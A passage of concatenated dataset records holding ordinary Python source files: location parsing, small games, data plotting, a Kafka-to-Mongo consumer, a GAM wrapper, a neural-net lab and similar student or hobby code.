approximate radius of earth in km\nDAY_MS = 86400000 # Day in milliseconds\nDEBUG = True\n\n# Math from https://stackoverflow.com/questions/19412462/getting-distance-between-two-points-based-on-latitude-longitude\n# Calculates the distance between two lat,lng points in kilometers. \n# Not quite accurate due to the Earth being a funny shape, but good enough for this.\ndef distanceKM(p1, p2):\n lat1 = radians(p1[\"lat\"])\n lon1 = radians(p1[\"lng\"])\n lat2 = radians(p2[\"lat\"])\n lon2 = radians(p2[\"lng\"])\n\n dlon = lon2 - lon1\n dlat = lat2 - lat1\n\n a = sin(dlat / 2)**2 + cos(lat1) * cos(lat2) * sin(dlon / 2)**2\n c = 2 * atan2(sqrt(a), sqrt(1 - a))\n # That's some crazy math\n\n distance = R * c\n return distance \n\n\n# Combines a list of similar location data points into a single entry.\n# Result: the average lat/lng, as well as the time range these points cover.\ndef aggregateLocations(similar):\n if similar is None or len(similar) == 0:\n print(\"This wasn't supposed to happen\")\n return None\n\n latSum = 0\n lngSum = 0\n timeLow = int(similar[0][\"timestampMs\"])\n timeHigh = timeLow\n count = len(similar)\n\n for loc in similar:\n time = loc[\"date\"]\n latSum += loc[\"lat\"]\n lngSum += loc[\"lng\"]\n timeLow = min(timeLow, time)\n timeHigh = max(timeHigh, time)\n\n return {\n \"lat\": latSum / count,\n \"lng\": lngSum / count,\n \"timeStartMs\": timeLow,\n \"timeEndMs\": timeHigh,\n \"count\": count\n }\n\n# Aggregates consecutive entries if they are close enough.\n# Returns a new list of aggregated data.\ndef aggregateConsecutive(filtered):\n last = filtered[0]\n result = []\n similar = []\n\n for location in filtered:\n delta = distanceKM(location, last)\n\n if delta > aggregateDistance:\n # Starting a new location. If the old one had enough data points, save it.\n if len(similar) > aggregateMinimum:\n spot = aggregateLocations(similar)\n result.append(spot)\n similar = []\n\n similar.append(location)\n last = location\n\n # Return list from oldest to newest data\n result.reverse()\n return result\n\n\n# Combines two aggregate data points, expands time range to the min/max of both.\n# Returns a new dict\ndef combineResults(first, second):\n firstCount = first[\"count\"]\n secondCount = second[\"count\"]\n total = firstCount + secondCount\n\n avgLat = (first[\"lat\"] * firstCount + second[\"lat\"] * secondCount) / total\n avgLng = (first[\"lng\"] * firstCount + second[\"lng\"] * secondCount) / total\n\n return {\n \"lat\": avgLat,\n \"lng\": avgLng,\n \"timeStartMs\": min(first[\"timeStartMs\"], second[\"timeStartMs\"]),\n \"timeEndMs\": max(first[\"timeEndMs\"], second[\"timeEndMs\"]),\n \"count\": total\n }\n\n# Finds and combines data points that weren't consecutive, but are still close in location\n# IE two nights at a hostel become a single point.\n# input toggles for distance and time.\ndef aggregateFurther(data, distance, timeThreshold):\n result = []\n\n for index in range(len(data)):\n x = data[index]\n added = False\n\n # For each data point, compare it with ones we've already processed.\n for i in range(len(result)):\n y = result[i]\n\n # if we're close enough and within the given time range, combine and continue\n if not added and distanceKM(x, y) < distance and (abs(y[\"timeStartMs\"] - x[\"timeEndMs\"]) < timeThreshold or abs(x[\"timeStartMs\"] - y[\"timeEndMs\"]) < timeThreshold):\n result[i] = combineResults(x, y)\n added = True\n\n # If we didn't find something to add this data point to, add it individualy to results.\n if not added:\n result.append(x)\n\n return result\n\n# Rotating certain data points around the map.\ndef flipDataPoints(data):\n for entry in data:\n if entry[\"lng\"] > flipMedianDegree:\n entry[\"lng\"] -= 360\n\n\n# Reads in a chapter file, and organizes our data points into custom chapters.\ndef chapterGrouping(data):\n with open(chapterFName) as data_file: \n chapters = json.load(data_file)\n\n for chap in chapters:\n \n start = int(chap[\"start\"])\n end = int(chap[\"end\"])\n\n children = []\n\n for date in data:\n if date[\"timeStartMs\"] >= start and date[\"timeEndMs\"] <= end:\n children.append(date)\n chap[\"children\"] = children\n chap[\"images\"] = []\n\n return chapters\n\ndef addImageMetadata(data):\n images = exifParse(img_dir)\n \n if DEBUG: print(\"Images loaded %s\" % len(images))\n flipDataPoints(images)\n\n for image in images:\n timeStamp = image[\"timestamp\"]\n\n for chapter in data:\n if int(chapter[\"start\"]) <= timeStamp and timeStamp <= int(chapter[\"end\"]):\n chapter[\"images\"].append(image)\n\n # This adds image location data into the timeline. It looks neat for now but a little busy\n # And I don't think its completely necessary. Will review once I add more images into the data.\n for chapter in data:\n for image in chapter[\"images\"]:\n imageLoc = {\n \"lat\": image[\"lat\"],\n \"lng\": image[\"lng\"],\n \"timeStartMs\": image[\"timestamp\"],\n \"timeEndMs\": image[\"timestamp\"],\n \"count\": 1\n }\n chapter[\"children\"].append(imageLoc)\n chapter[\"children\"].sort(key=lambda x: x[\"timeEndMs\"], reverse=True)\n return data\n\n\n\ndef main():\n with open(fname) as data_file: \n data = json.load(data_file)\n if DEBUG: print(\"Input length %s\" % len(data))\n\n data = aggregateConsecutive(data)\n if DEBUG: print(\"Aggregated length %s\" % len(data))\n\n data = aggregateFurther(data, furtherAggregateDistance, DAY_MS)\n if DEBUG: print(\"Final length %s\" % len(data))\n\n flipDataPoints(data)\n\n data = chapterGrouping(data)\n if DEBUG: print(\"Chapter count %s\" % len(data))\n\n data = addImageMetadata(data)\n\n # TODO - Unique ID tag to everything\n # TODO - Curate Data. Further aggregate in specific locations (but keeping existing data in a list)\n # IE returning PARIS, but you can expand. Waiting until we start integrating photo info. \n # TODO - Blacklist of unwanted locations. Some personal, some random road trip data.\n # TODO - Blacklist Seattle? \n\n with open(outName, \"w\") as out_file:\n json.dump(data, out_file, indent=2)\n\nmain() ","sub_path":"src/scripts/mapparser.py","file_name":"mapparser.py","file_ext":"py","file_size_in_byte":7246,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"57170911","text":"import pygame\r\nfrom enemy import Enemy\r\nimport random\r\nimport constants as c\r\n\r\n\r\nclass EnemySpawner:\r\n def __init__(self):\r\n self.enemy_group = pygame.sprite.Group()\r\n self.spawn_timer = random.randrange(30, 120)\r\n\r\n\r\n def update(self):\r\n self.enemy_group.update()\r\n for enemy in self.enemy_group:\r\n if enemy.rect.y >= c.DISPLAY_HEIGHT:\r\n self.enemy_group.remove(enemy)\r\n if self.spawn_timer == 0:\r\n self.spawn_enemy()\r\n self.spawn_timer = random.randrange(30, 120)\r\n else:\r\n self.spawn_timer = self.spawn_timer - 1\r\n\r\n def spawn_enemy(self):\r\n new_enemy = Enemy()\r\n self.enemy_group.add(new_enemy)","sub_path":"Galaga-Game/enemy_spawner.py","file_name":"enemy_spawner.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"513320915","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport pandas as pd\r\ndf = pd.read_csv('pandas/zamowienia.csv', header=0, delimiter=\";\")\r\ndf_np = np.array(df)\r\ndane = df.groupby(['Sprzedawca']).agg({\"idZamowienia\": [\"count\"]})\r\nExplode = [1/(i-0.1) for i in range(len(dane.index.values))]\r\nwedges, texts, autotexts = plt.pie(dane.values, explode=Explode, labels=dane.index.values,\r\n autopct=lambda pct: \"{:.1f}%\".format(pct), textprops=dict(color=\"black\"))\r\nplt.setp(autotexts, size=14, weight=\"bold\")\r\nplt.title(\"Pierwsza wersja wykresu\")\r\nplt.legend(title='Zawodnicy')\r\nplt.show()\r\n","sub_path":"numpy/pandas/zad.9.9 zestaw 10.py","file_name":"zad.9.9 zestaw 10.py","file_ext":"py","file_size_in_byte":622,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"631345423","text":"from subprocess import call\nfrom behave import *\nfrom lib.guestbook import GuestBook\n\n@given('there is a guestbook with signatures')\ndef step_there_is_guestbook(context):\n context.guestbook = GuestBook()\n for person in context.table:\n context.guestbook.add(person['name'])\n\n@then('a user will find \"{name}\" there')\ndef step_list_of_guests(context, name):\n names = []\n guest_list = context.guestbook.list()\n for person in guest_list:\n names.append(person[0])\n\n msg = \"{} not found in {}\".format(name, names)\n assert name in names, msg\n","sub_path":"features/steps/guestbook.py","file_name":"guestbook.py","file_ext":"py","file_size_in_byte":569,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"102206220","text":"# 当然TLE\n\nN, M, K = map(int, input().split())\nMOD = 998244353\n\nroad = [[] for _ in range(N)]\ndp = [[0 for _ in range(N)] for j in range(K+1)]\ndp[0][0] = 1\n\nfor _ in range(M):\n tmp = list(map(int, input().split()))\n road[tmp[0]-1].append(tmp[1]-1)\n road[tmp[1]-1].append(tmp[0]-1)\n\nfor i in range(K):\n for j in range(N):\n for k in range(N):\n if j == k:\n continue\n dp[i+1][k] += dp[i][j]\n dp[i+1][k] %= MOD\n\n for k in road[j]:\n dp[i+1][k] -= dp[i][j]\n dp[i+1][k] %= MOD\n\nprint(dp[K][0])\n","sub_path":"contest/abc212/e.py","file_name":"e.py","file_ext":"py","file_size_in_byte":584,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"317034883","text":"import argparse\nfrom functools import partial\nimport os\nfrom pprint import pprint\n\nimport msgpack\nimport msgpack_numpy as mpn\n\nfrom bluesky_kafka import MongoConsumer\n\n\nparser = argparse.ArgumentParser(\n description=\"monogo consumer process\",\n)\nparser.add_argument(\n \"--kafka_server\",\n type=str,\n help=\"bootstrap server to connect to.\",\n default=\"127.0.0.1:9092\",\n)\nparser.add_argument(\n \"--kafka_group\",\n type=str,\n help=\"bootstrap server to connect to.\",\n default=\"mongo-consumers\",\n)\nparser.add_argument(\n \"--mongo_uri\",\n type=str,\n help=\"bootstrap server to connect to.\",\n default=\"mongodb://localhost:27017\",\n)\n\nargs = parser.parse_args()\n\nmongo_uri = args.mongo_uri\nbootstrap_servers = args.kafka_server\n\nkafka_deserializer = partial(msgpack.loads, object_hook=mpn.decode)\nauto_offset_reset = \"latest\"\ntopics = [\"^.*bluesky.documents\"]\n\n# Create a MongoConsumer that will automatically listen to new beamline topics.\n# The parameter metadata.max.age.ms determines how often the consumer will check for\n# new topics. The default value is 5000ms.\nsettings = dict(\n topics=topics,\n bootstrap_servers=bootstrap_servers,\n group_id=args.kafka_group,\n mongo_uri=mongo_uri,\n consumer_config={\"auto.offset.reset\": auto_offset_reset},\n polling_duration=1.0,\n deserializer=kafka_deserializer,\n)\npprint(settings)\nmongo_consumer = MongoConsumer(**settings)\n\n\nmongo_consumer.start()\n","sub_path":"ae_gpcam/bluesky_config/scripts/mongo_consumer.py","file_name":"mongo_consumer.py","file_ext":"py","file_size_in_byte":1435,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"109895037","text":"\"\"\"@author: Bryan Silverthorn \"\"\"\n\nimport numpy\nimport rpy2.robjects\nimport rpy2.robjects.packages\nimport rpy2.robjects.numpy2ri\n\ndef ilogit(x):\n return 1.0 / (1.0 + numpy.exp(-x))\n\nclass RGAM(object):\n def __init__(self, X, Y):\n # rescale the inputs\n X = numpy.array(X)\n\n self._inputs_mean = numpy.mean(X, axis = 0)\n\n X -= self._inputs_mean\n\n self._inputs_std = numpy.std(X, axis = 0)\n self._inputs_std[self._inputs_std <= numpy.finfo(float).eps] = 1.0\n\n X /= self._inputs_std\n\n # build our data frame\n columns = {\"label\": rpy2.robjects.FloatVector(Y)}\n self._feature_dimensions = set()\n self._feature_names = set()\n\n for d in xrange(X.shape[1]):\n column_data = X[:, d]\n\n if len(numpy.unique(column_data)) >= 4:\n name = \"d{0}\".format(d)\n\n columns[name] = rpy2.robjects.FloatVector(column_data)\n\n self._feature_names.add(name)\n self._feature_dimensions.add(d)\n\n data = rpy2.robjects.DataFrame(columns)\n\n # fit our GAM\n self._gam = rpy2.robjects.packages.importr(\"gam\")\n self._formula = rpy2.robjects.Formula(\"label ~ \" + \" + \".join(map(\"s({0})\".format, self._feature_names)))\n\n for name in data.colnames:\n self._formula.environment[name] = data.rx2(name)\n\n self._model = self._gam.gam(self._formula, family = rpy2.robjects.r.binomial, data = data)\n\n def predict_proba(self, X):\n # build our data frame\n scaled = (numpy.asarray(X) - self._inputs_mean) / self._inputs_std\n columns = {}\n\n for d in xrange(scaled.shape[1]):\n if d in self._feature_dimensions:\n columns[\"d{0}\".format(d)] = rpy2.robjects.FloatVector(scaled[:, d])\n\n data = rpy2.robjects.DataFrame(columns)\n\n # generate predictions\n v = rpy2.robjects.r.predict(self._model, newdata = data)\n p = ilogit(numpy.asarray(v))\n\n return numpy.array([1 - p, p]).T\n\n","sub_path":"src/python/gampy/rgam.py","file_name":"rgam.py","file_ext":"py","file_size_in_byte":2052,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"333831578","text":"'''\nArb Doc\n'''\n#!/usr/bin/env python3\n\nfrom riker import Riker\nfrom templates import TEMPLATES\n\n\ndef main():\n '''\n init the main routine\n\n '''\n riker = Riker(TEMPLATES)\n riker.get_user_input()\n riker.build_directories()\n riker.build_project()\n\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"modules/riker_run.py","file_name":"riker_run.py","file_ext":"py","file_size_in_byte":306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"299554242","text":"import locale\nlocale.setlocale(locale.LC_ALL,'')\nage = 35\nend = 70\nstockrate = 0.0389\nmonth_drawal = 300+500+200+200+120\nstartwithdraw = 40\n\nyears = end - age\nmonths = years * 12\nstocks = (210 + 25 + 26 )*1000\nnowith = stocks\nmonthrate = stockrate / 12\nprint(\"stocks : {}\".format( stocks ))\nlaststock = None\nlasts = list()\nlastsno = list()\nstartwdmonth = (startwithdraw - age)*12\nwithdrew = 0\nlasts.append(stocks)\nlastsno.append(stocks)\nfor month in range(months):\n stocks = round((stocks * monthrate) + stocks,2)\n nowith = round((nowith * monthrate) + nowith,2)\n\n if month > startwdmonth:\n stocks = stocks - month_drawal\n withdrew += month_drawal\n\n if not month % 12 and month >= 12:\n print(\"year : {}\".format( month/12 ))\n lasts.append(stocks)\n lastsno.append(nowith)\n if len(lasts) >= 2:\n print(\"annual : {}\".format( lasts[-1]/lasts[-2] ))\n print(\"annual : {}\".format( lastsno[-1]/lastsno[-2] ))\n print(\"stocks : {}\".format( locale.currency(stocks, grouping = True )))\n print(\"nowith : {}\".format( locale.currency(nowith, grouping = True )))\n print(\"difference : {} withdrew {}\\n\".format( nowith-stocks, withdrew ))\n \nprint(\"lasts : {}\".format( lasts ))\nprint(\"years : {}\".format( years ))\nprint(\"annual draw : {}\".format( 12*month_drawal ))\n\n","sub_path":"python/zen/fire_calc.py","file_name":"fire_calc.py","file_ext":"py","file_size_in_byte":1358,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"90717122","text":"#!/usr/bin/env python\nimport json, sys, os\nfrom urllib import urlopen\n\nSERVER=\"http://aflowlib.duke.edu\"\nAPI=\"/search/API/?\"\nMATCHBOOK=\"species((Na:K),Cl),nspecies(2),Egap(2*,*5),energy_cell\"\nDIRECTIVES=\"$paging(0)\"\nSUMMONS=MATCHBOOK+\",\"+DIRECTIVES\n\nresponse=json.loads(urlopen(SERVER+API+SUMMONS).read().decode(\"utf-8\"))\nfor datum in response:\n bandgap=[float(x) for x in datum['Egap'].split(\",\")]\n energycell=[float(x) for x in datum['energy_cell'].split(\",\")] \n print (\"{}, {}, {}\".format( datum['auid'], bandgap, energycell))\n","sub_path":"Day 4 - Demonstrations/AFLOW/AFLUX_example.py","file_name":"AFLUX_example.py","file_ext":"py","file_size_in_byte":542,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"443613090","text":"class MedianFinder:\n\n def __init__(self):\n \"\"\"\n initialize your data structure here.\n \"\"\"\n self.max_l_heap = []\n self.min_r_heap = []\n\n\n def addNum(self, num: int) -> None:\n small, large = self.max_l_heap, self.min_r_heap\n heapq.heappush(small, -num)\n left_max = heapq.heappop(small)\n heapq.heappush(large, -left_max)\n if len(small) < len(large):\n heapq.heappush(small, -heapq.heappop(large))\n\n\n\n def findMedian(self) -> float:\n small, large = self.max_l_heap, self.min_r_heap\n if len(small) > len(large):\n return -small[0]\n return (-small[0] + large[0]) / 2\n\n\n# Your MedianFinder object will be instantiated and called as such:\n# obj = MedianFinder()\n# obj.addNum(num)\n# param_2 = obj.findMedian()\n","sub_path":"python/295. Find Median from Data Stream.py","file_name":"295. Find Median from Data Stream.py","file_ext":"py","file_size_in_byte":821,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"58517746","text":"import bpy\nfrom ...common_utilities import showErrorMessage\n\nclass OpenLog(bpy.types.Operator):\n \"\"\"Open log text files in new window\"\"\"\n bl_idname = \"wm.open_log\"\n bl_label = \"Open Log in Text Editor\"\n\n def execute(self, context):\n\n self.openTextFile('RetopoFlow_log')\n\n return {'FINISHED'}\n\n def openTextFile(self, filename):\n\n # play it safe!\n if filename not in bpy.data.texts:\n showErrorMessage('Log file not found')\n return\n\n # duplicate the current area then change it to a text edito\n area_dupli = bpy.ops.screen.area_dupli('INVOKE_DEFAULT')\n win = bpy.context.window_manager.windows[-1]\n area = win.screen.areas[-1]\n area.type = 'TEXT_EDITOR'\n\n # load the text file into the correct space\n for space in area.spaces:\n if space.type == 'TEXT_EDITOR':\n space.text = bpy.data.texts[filename]\n\n","sub_path":"lib/classes/logging/logging.py","file_name":"logging.py","file_ext":"py","file_size_in_byte":938,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"49797247","text":"\"\"\"\r\n sketch2image:\r\n Asian face sketch -> real face image\r\n\"\"\"\r\n\r\nfrom my_utils import *\r\nfrom model import *\r\nimport numpy as np\r\nimport os\r\n\r\n# data preprocess\r\nSIZE = 256\r\n\r\nimage_path = 'datasets/photos'\r\nsketch_path = 'datasets/sketches'\r\n\r\nimage_file = sorted_path(os.listdir(image_path))\r\nsketch_file = sorted_path(os.listdir(sketch_path))\r\n\r\nimg_array = expand_image_array(path=image_path, path_list=image_file, size=(SIZE, SIZE))\r\nsketch_array = expand_image_array(path=sketch_path, path_list=sketch_file, size=(SIZE, SIZE))\r\n\r\nprint(\"Total number of sketch images:\", len(sketch_array))\r\nprint(\"Total number of images:\", len(img_array))\r\n\r\n# show example\r\nplot_images(img_array[0], sketch_array[0])\r\n\r\ntrain_sketch_image = sketch_array[:1400]\r\ntrain_image = img_array[:1400]\r\ntest_sketch_image = sketch_array[1400:]\r\ntest_image = img_array[1400:]\r\n\r\n# reshaping\r\ntrain_sketch_image = np.reshape(train_sketch_image, (len(train_sketch_image), SIZE, SIZE, 3))\r\ntrain_image = np.reshape(train_image, (len(train_image), SIZE, SIZE, 3))\r\nprint('Train color image shape:', train_image.shape)\r\ntest_sketch_image = np.reshape(test_sketch_image, (len(test_sketch_image), SIZE, SIZE, 3))\r\ntest_image = np.reshape(test_image, (len(test_image), SIZE, SIZE, 3))\r\nprint('Test color image shape', test_image.shape)\r\n\r\n# create model\r\nmodel = Sketch2Image()\r\n\r\n# optimizer and loss\r\nmodel.compile(optimizer='adam',\r\n loss=tf.keras.losses.mean_squared_error,\r\n metrics=['accuracy'])\r\n\r\n# training\r\nhistory = model.fit(train_sketch_image, train_image, epochs=0, validation_data=(test_sketch_image, test_image),\r\n validation_freq=1)\r\n# model.summary()\r\n\r\n# plot metric\r\nplot_metrics(history, metric='accuracy', show=False)\r\n\r\n# save model1\r\nsave_path = 'my_model/my_model'\r\nsave_all_model(model, save_path, save=False)\r\n\r\n# load model\r\nfresh_model = load_all_model(model, save_path, load=True)\r\n\r\n# show predict\r\nls = [i for i in range(16, 40, 8)]\r\nfor i in ls:\r\n predicted = np.clip(fresh_model.predict(test_image[i].reshape(1, SIZE, SIZE, 3)), 0.0, 1.0).reshape((SIZE, SIZE, 3))\r\n print('pred', predicted.shape)\r\n show_images(test_image[i], test_sketch_image[i], predicted)\r\n\r\n# test my own image\r\nshow_my_images('my_images/criminal_1.jpg', model=fresh_model, size=SIZE)\r\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2324,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"634897438","text":"import pygame, easygui, sys\nfrom PyQt4 import QtGui, QtCore\ndef get_fonts():\n a = pygame.font.get_fonts()\n return a\ndef write(txt, screen, x, y, size = 16, color = [0, 0, 0], font = \"freesansbold.ttf\"):\n s_str = txt\n s_font = pygame.font.Font(font, size)\n s_surf = s_font.render(s_str, 1, color)\n screen.blit(s_surf, [x, y])\ndef str2bool(txt):\n if txt == \"True\":\n return True\n else:\n return False\n\n\ndef str2bool_file(file):\n file_name = open(file, \"r\")\n text = file_name.read()\n file_name.close()\n result = str2bool(text)\n return result\n\ndef write_file(file_name, txt):\n open1 = open(file_name, \"w\")\n open1.write(txt)\n open1.close()\n\ndef read_file(file_name):\n open1 = open(file_name)\n txt = open1.read()\n open1.close()\n return txt\n\ndef fill_file_int(file_name):\n ro = open(file_name)\n qe = ro.read()\n ro.close()\n if qe == \"\":\n to = open(file_name, \"w\")\n to.write(\"0\")\n to.close()\n\ndef file_availability(file_name, txt = \"\"):\n try:\n file = open(file_name)\n except IOError:\n f = open(file_name, \"w\")\n f.write(txt)\n f.close()\n else:\n file.close()\n\ndef buy(file_oblect, cost, txt, file_money = \"score_shooter\", dop_file = \"rocket\"):\n txt_1 = read_file(file_oblect)\n if str2bool(txt_1):\n easygui.msgbox(\"You already have this module\")\n\n else:\n score_1 = read_file(\"score_shooter\")\n if int(score_1) >= 1000:\n write_file(file_oblect, \"True\")\n write_file(file_money, str(int(score_1) - cost))\n easygui.msgbox(\"the buy was successful!\")\n else:\n easygui.critical(\"not enough money!\")\n\n\ndef restart(app):\n reset = True\n app.exit()\n return reset\n\n\n\n\n","sub_path":"writer.py","file_name":"writer.py","file_ext":"py","file_size_in_byte":1783,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"633433424","text":"from flask import Flask\r\nfrom flask import url_for, render_template, request, redirect\r\n\r\napp = Flask(__name__)\r\n\r\n@app.route('/')\r\ndef index():\r\n return render_template('index.html')\r\n\r\n\r\n@app.route('/result')\r\n\r\ndef ans_counter(name, pet, n1, n2):\r\n if request.args:\r\n for name in request.args:\r\n if name == 'name':\r\n arr.append(request.args[name])\r\n times+=1\r\n for pet in request.args:\r\n if pet == 'Cat':\r\n n1+=1\r\n else:\r\n n2+=1\r\n\r\n return render_template('result.html', name=name, pet=pet, n1=n1, n2=n2)\r\n return redirect(url_for('result.html'))\r\n\r\nif __name__ == '__main__':\r\n app.run(debug=True)","sub_path":"Flask_intro/flak site.py","file_name":"flak site.py","file_ext":"py","file_size_in_byte":727,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"256233630","text":"# MIT 6.034 Lab 6: Neural Nets\n# Written by Jessica Noss (jmn), Dylan Holmes (dxh), Jake Barnwell (jb16), and 6.034 staff\n\nfrom nn_problems import *\nfrom math import e\nfrom math import exp\nfrom itertools import permutations\nINF = float('inf')\n\n#### NEURAL NETS ###############################################################\n\n# Wiring a neural net\n\nnn_half = [1]\n\nnn_angle = [2,1]\n\nnn_cross = [2,2,1]\n\nnn_stripe = [3,1]\n\nnn_hexagon = [6,1]\n\nnn_grid = [4,2,1]\n\n# Threshold functions\ndef stairstep(x, threshold=0):\n if x >= threshold:\n return 1\n if x < threshold:\n return 0\n\ndef sigmoid(x, steepness=1, midpoint=0):\n return 1/(1 + exp(-steepness*(x-midpoint)))\n\ndef ReLU(x):\n if x >= 0:\n return x\n return 0\n\n# Accuracy function\ndef accuracy(desired_output, actual_output):\n return -0.5*pow(desired_output-actual_output,2)\n\n# Forward propagation\n\ndef node_value(node, input_values, neuron_outputs): # STAFF PROVIDED\n \"\"\"Given a node, a dictionary mapping input names to their values, and a\n dictionary mapping neuron names to their outputs, returns the output value\n of the node.\"\"\"\n if isinstance(node, basestring):\n return input_values[node] if node in input_values else neuron_outputs[node]\n return node # constant input, such as -1\n\ndef forward_prop(net, input_values, threshold_fn=stairstep):\n \"\"\"Given a neural net and dictionary of input values, performs forward\n propagation with the given threshold function to compute binary output.\n This function should not modify the input net. Returns a tuple containing:\n (1) the final output of the neural net\n (2) a dictionary mapping neurons to their immediate outputs\"\"\"\n for neuron in net.topological_sort():\n accumulator = 0\n for in_wire in net.get_wires(endNode=neuron):\n if type(in_wire.startNode) is int:\n in_value = in_wire.startNode\n else:\n in_value = input_values[in_wire.startNode]\n accumulator += in_value * in_wire.get_weight()\n out_value = threshold_fn(accumulator)\n input_values[neuron] = out_value\n return (input_values[net.get_output_neuron()], input_values)\n\n\n# Backward propagation warm-up\ndef gradient_ascent_step(func, inputs, step_size):\n \"\"\"Given an unknown function of three variables and a list of three values\n representing the current inputs into the function, increments each variable\n by +/- step_size or 0, with the goal of maximizing the function output.\n After trying all possible variable assignments, returns a tuple containing:\n (1) the maximum function output found, and\n (2) the list of inputs that yielded the highest function output.\"\"\"\n perm_list = []\n inputs = list(inputs)\n for i in range(-1,2):\n perm = [0,0,0]\n perm[0] = (inputs[0] + step_size*i)\n for j in range(-1,2):\n perm[1] = (inputs[1] + step_size*j)\n for k in range(-1,2):\n perm[2] = (inputs[2] + step_size*k)\n perm_list.append((func(*perm), tuple(perm)))\n return max(perm_list, key=lambda elem: elem[0])\n\n\ndef get_back_prop_dependencies(net, wire):\n \"\"\"Given a wire in a neural network, returns a set of inputs, neurons, and\n Wires whose outputs/values are required to update this wire's weight.\"\"\"\n depends = set()\n for elem in [wire.startNode, wire, wire.endNode]:\n depends.add(elem)\n current_neuron = wire.endNode\n out_node = net.get_output_neuron()\n added_nonchecked_neurons = [current_neuron]\n while current_neuron != out_node and added_nonchecked_neurons != None:\n depends.add(current_neuron)\n for wire in net.get_wires(startNode=current_neuron):\n depends.add(wire)\n added_nonchecked_neurons.append(wire.endNode)\n added_nonchecked_neurons.append(wire.startNode)\n current_neuron = added_nonchecked_neurons[0]\n added_nonchecked_neurons = added_nonchecked_neurons[1:]\n depends.add(out_node)\n return depends\n\n\n# Backward propagation\ndef calculate_deltas(net, desired_output, neuron_outputs):\n \"\"\"Given a neural net and a dictionary of neuron outputs from forward-\n propagation, computes the update coefficient (delta_B) for each\n neuron in the net. Uses the sigmoid function to compute neuron output.\n Returns a dictionary mapping neuron names to update coefficient (the\n delta_B values). \"\"\"\n delta_dict = {}\n for neuron in net.topological_sort()[::-1]:\n output = neuron_outputs[neuron]\n if net.is_output_neuron(neuron):\n delta_dict[neuron] = output*(1-output)*(desired_output-output)\n else:\n outgoing_neighbors = net.get_outgoing_neighbors(neuron)\n wires = net.get_wires(startNode=neuron)\n outgoing_sum = sum([wire.get_weight()*delta_dict[wire.endNode] for wire in wires])\n delta_dict[neuron] = output*(1-output)*outgoing_sum\n return delta_dict\n\ndef update_weights(net, input_values, desired_output, neuron_outputs, r=1):\n \"\"\"Performs a single step of back-propagation. Computes delta_B values and\n weight updates for entire neural net, then updates all weights. Uses the\n sigmoid function to compute neuron output. Returns the modified neural net,\n with the updated weights.\"\"\"\n delta_dict = calculate_deltas(net, desired_output, neuron_outputs)\n neuron_outputs.update(input_values)\n for wire in net.get_wires():\n try:\n wire.set_weight(wire.get_weight()+r*neuron_outputs[wire.startNode]*delta_dict[wire.endNode])\n except KeyError:\n wire.set_weight(wire.get_weight()+r*wire.startNode*delta_dict[wire.endNode])\n return net\n\ndef back_prop(net, input_values, desired_output, r=1, minimum_accuracy=-0.001):\n \"\"\"Updates weights until accuracy surpasses minimum_accuracy. Uses the\n sigmoid function to compute neuron output. Returns a tuple containing:\n (1) the modified neural net, with trained weights\n (2) the number of iterations (that is, the number of weight updates)\"\"\"\n iterations = 0\n actual_output, neuron_outputs = forward_prop(net,input_values,sigmoid)\n performance = accuracy(desired_output, actual_output)\n while performance < minimum_accuracy:\n net = update_weights(net,input_values,desired_output, neuron_outputs, r)\n actual_output, neuron_outputs = forward_prop(net,input_values,sigmoid)\n performance = accuracy(desired_output, actual_output)\n iterations += 1\n return (net, iterations)\n\n\n# Training a neural net\n\nANSWER_1 = 11\nANSWER_2 = 14\nANSWER_3 = 3\nANSWER_4 = 114\nANSWER_5 = 32\n\nANSWER_6 = 1\nANSWER_7 = \"checkerboard\"\nANSWER_8 = [\"small\", \"medium\", \"large\"]\nANSWER_9 = \"B\"\n\nANSWER_10 = \"D\"\nANSWER_11 = [\"A\", \"C\"]\nANSWER_12 = [\"A\", \"E\"]\n\n\n#### SURVEY ####################################################################\n\nNAME = None\nCOLLABORATORS = None\nHOW_MANY_HOURS_THIS_LAB_TOOK = None\nWHAT_I_FOUND_INTERESTING = None\nWHAT_I_FOUND_BORING = None\nSUGGESTIONS = None\n","sub_path":"lab6/lab6.py","file_name":"lab6.py","file_ext":"py","file_size_in_byte":7033,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"492887536","text":"#Survival\n\n#1. In the Forest (Iterable) lives Predators and Herbivores (abstract class of animal and two offspring).\n#Each animal is born with the following parameters (by using random):\n#- strength (from 25 to 100 points)\n#- speed (from 25 to 100 points)\n#The force cannot be greater than it was at birth (initialization).\n\n#At each step of the game we take 1 animal from the forest (iteration):\n#- If it is herbivorous, then it eats (restores its strength by 50%).\n#- If it is a predator, it hunts - randomly chooses an animal from the forest and:\n# - pulled himself out, he was unlucky and he was left without a dinner;\n# - pulled out another animal, then tries to catch up;\n# - if he can catch up, he catches up and attacks;\n# - if attacked and is stronger, then eats and restores 50% of strength;\n# - did not catch up or did not have enough strength, then he and the lucky 